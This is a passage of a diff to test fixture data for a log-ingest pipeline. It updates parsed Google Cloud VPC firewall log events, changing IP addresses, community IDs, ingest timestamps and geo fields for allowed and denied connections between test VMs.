"{\"insertId\":\"lx5jlsfggpr0q\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte 
d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:28.203068653Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:22.930570324Z\"}", "kind": "event", "action": "firewall-rule", "id": "lx5jlsfggpr0q", @@ -1306,16 +1295,16 @@ "city_name": "İzmir", "region_name": "İzmir" }, - "address": "192.0.2.200", + "address": "192.168.2.200", "port": 42716, - "ip": "192.0.2.200" + "ip": "192.168.2.200" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:6fenc8+hp2KWF1J9vvGwv3iswV0=", + "community_id": "1:5cdw7jmZns9wqKsd7hRHlQJgaQ4=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1334,7 +1323,7 @@ }, "related": { "ip": [ - "192.0.2.200", + "192.168.2.200", "10.28.0.16" ] }, 
@@ -1375,8 +1364,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147445200Z", - "original": "{\"insertId\":\"18ynfbufer19m1\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.0.2.200\",\"src_port\":42716},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"İzmir\",\"continent\":\"Asia\",\"country\":\"tur\",\"region\":\"İzmir\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:32:14.038485761Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:32:07.407039908Z\"}", + "ingested": "2021-12-09T13:37:43.705567900Z", + "original": 
"{\"insertId\":\"18ynfbufer19m1\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.200\",\"src_port\":42716},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"İzmir\",\"continent\":\"Asia\",\"country\":\"tur\",\"region\":\"İzmir\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:32:14.038485761Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:32:07.407039908Z\"}", "kind": "event", "action": "firewall-rule", "id": "18ynfbufer19m1", @@ -1390,23 +1379,12 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } + "continent_name": "America", + "country_name": "usa" }, - "address": "8.8.8.8", + "address": "67.43.156.13", "port": 80, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "name": "network:default/firewall:adrian-test-1" @@ -1422,7 +1400,7 @@ ], "network": { "name": "default", - "community_id": "1:L+yxRTY3bxAv2hbljIrAstKlE+g=", + "community_id": "1:t2QQzu4ufNOZo7NH5i90Aqyel1Q=", "transport": "tcp", "type": "ipv4", "iana_number": "6", 
@@ -1442,7 +1420,7 @@ "related": { "ip": [ "10.28.0.16", - "8.8.8.8" + "67.43.156.13" ] }, "gcp": { 
@@ -1478,8 +1456,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147448900Z", - "original": "{\"insertId\":\"tzddthfsr6fv5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"8.8.8.8\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.28.0.16\",\"src_port\":46418},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:41:28.971534988Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:41:20.972747063Z\"}", + "ingested": "2021-12-09T13:37:43.705590600Z", + "original": 
"{\"insertId\":\"tzddthfsr6fv5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.28.0.16\",\"src_port\":46418},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:41:28.971534988Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:41:20.972747063Z\"}", "kind": "event", "action": "firewall-rule", "id": "tzddthfsr6fv5", @@ -1493,23 +1471,12 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } + "continent_name": "America", + "country_name": "usa" }, - "address": "8.8.8.8", + "address": "67.43.156.13", "port": 80, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "name": "network:default/firewall:adrian-test-1" @@ -1525,7 +1492,7 @@ ], "network": { "name": "default", - "community_id": "1:c7bqGkBTPmOmWydHv/uxpk1qOjc=", + "community_id": "1:91bfvmXgXGnCZmHTsH6bUtpBCwY=", "transport": "udp", "type": "ipv4", "iana_number": "17", 
@@ -1545,7 +1512,7 @@ "related": { "ip": [ "10.28.0.16", - "8.8.8.8" + "67.43.156.13" ] }, "gcp": { 
@@ -1581,8 +1548,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147473900Z", - "original": "{\"insertId\":\"1k2b7kefsnhzq7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"8.8.8.8\",\"dest_port\":80,\"protocol\":17,\"src_ip\":\"10.28.0.16\",\"src_port\":58725},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:42:33.671883883Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:42:26.50532921Z\"}", + "ingested": "2021-12-09T13:37:43.705596600Z", + "original": 
"{\"insertId\":\"1k2b7kefsnhzq7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":80,\"protocol\":17,\"src_ip\":\"10.28.0.16\",\"src_port\":58725},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:42:33.671883883Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:42:26.50532921Z\"}", "kind": "event", "action": "firewall-rule", "id": "1k2b7kefsnhzq7", @@ -1608,17 +1575,17 @@ "continent_name": "America", "country_name": "usa" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 44666, "domain": "test-kibana", - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:DAX43chSGct8LhjTchX9JgmQSEE=", + "community_id": "1:71E7EwkkBhmIXFYLBhatQg26r3M=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1637,7 +1604,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.42.0.10" ] }, 
@@ -1689,8 +1656,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147492300Z", - "original": "{\"insertId\":\"1sdfuwxfk8hq1c\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":44666},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.531819246Z\"}", + "ingested": "2021-12-09T13:37:43.705601100Z", + "original": 
"{\"insertId\":\"1sdfuwxfk8hq1c\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":44666},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.531819246Z\"}", "kind": "event", "action": "firewall-rule", "id": "1sdfuwxfk8hq1c", @@ -1716,17 +1683,17 @@ "continent_name": "America", "country_name": "usa" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 44668, "domain": "test-kibana", - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:TPU3xS0q892TRpPVImmLO31ok9s=", + "community_id": "1:kjnX5ow0hgQpA+DuU3FS4Bz+93M=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1745,7 +1712,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.42.0.10" ] }, 
@@ -1797,8 +1764,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147497700Z", - "original": "{\"insertId\":\"1sdfuwxfk8hq1b\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":44668},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.551617516Z\"}", + "ingested": "2021-12-09T13:37:43.705605700Z", + "original": 
"{\"insertId\":\"1sdfuwxfk8hq1b\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":44668},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.551617516Z\"}", "kind": "event", "action": "firewall-rule", "id": "1sdfuwxfk8hq1b", @@ -1826,16 +1793,16 @@ "city_name": "Almelo", "region_name": "Overijssel" }, - "address": "192.0.2.7", + "address": "192.168.2.7", "port": 1683, - "ip": "192.0.2.7" + "ip": "192.168.2.7" }, "tags": [ "preserve_original_event" ], "network": { "name": "windows-isolated", - "community_id": "1:nptqbsyCEhZhJ1ZBfy4iEMDFucI=", + "community_id": "1:FnXfTcArp/LffPC0tx64B4rTV6E=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1854,7 +1821,7 @@ }, "related": { "ip": [ - "192.0.2.7", + "192.168.2.7", "10.42.0.2" ] }, 
@@ -1894,8 +1861,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147502100Z", - "original": "{\"insertId\":\"yot1ojetjdiw\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.0.2.7\",\"src_port\":1683},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"city\":\"Almelo\",\"continent\":\"Europe\",\"country\":\"nld\",\"region\":\"Overijssel\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:28.477733837Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:15.771161946Z\"}", + "ingested": "2021-12-09T13:37:43.705611400Z", + "original": 
"{\"insertId\":\"yot1ojetjdiw\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.168.2.7\",\"src_port\":1683},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"city\":\"Almelo\",\"continent\":\"Europe\",\"country\":\"nld\",\"region\":\"Overijssel\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:28.477733837Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:15.771161946Z\"}", "kind": "event", "action": "firewall-rule", "id": "yot1ojetjdiw", @@ -1921,17 +1888,17 @@ "continent_name": "America", "country_name": "usa" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 45068, "domain": "test-kibana", - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:+KvUpcdGASPCZ5QYcOHVgid9Yjg=", + "community_id": "1:/ut7lWVheWNhh3UrQNn/8O2iPS0=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -1950,7 +1917,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.42.0.10" ] }, 
@@ -2002,8 +1969,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147506200Z", - "original": "{\"insertId\":\"5a27u1g22jks9e\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":45068},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.850729583Z\"}", + "ingested": "2021-12-09T13:37:43.705617Z", + "original": 
"{\"insertId\":\"5a27u1g22jks9e\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":45068},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:35.850729583Z\"}", "kind": "event", "action": "firewall-rule", "id": "5a27u1g22jks9e", @@ -2029,17 +1996,17 @@ "continent_name": "America", "country_name": "usa" }, - "address": "192.0.2.114", + "address": "192.168.2.114", "port": 45062, "domain": "test-kibana", - "ip": "192.0.2.114" + "ip": "192.168.2.114" }, "tags": [ "preserve_original_event" ], "network": { "name": "default", - "community_id": "1:v6u3NIKBcvTUebkWUOly9nrN/HE=", + "community_id": "1:59vjEXNOC6W+KGAxHCndM//owm0=", "transport": "tcp", "type": "ipv4", "iana_number": "6", @@ -2058,7 +2025,7 @@ }, "related": { "ip": [ - "192.0.2.114", + "192.168.2.114", "10.42.0.10" ] }, 
@@ -2110,8 +2077,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.147510100Z", - "original": "{\"insertId\":\"5a27u1g22jks8t\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.0.2.114\",\"src_port\":45062},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:45.189726185Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54: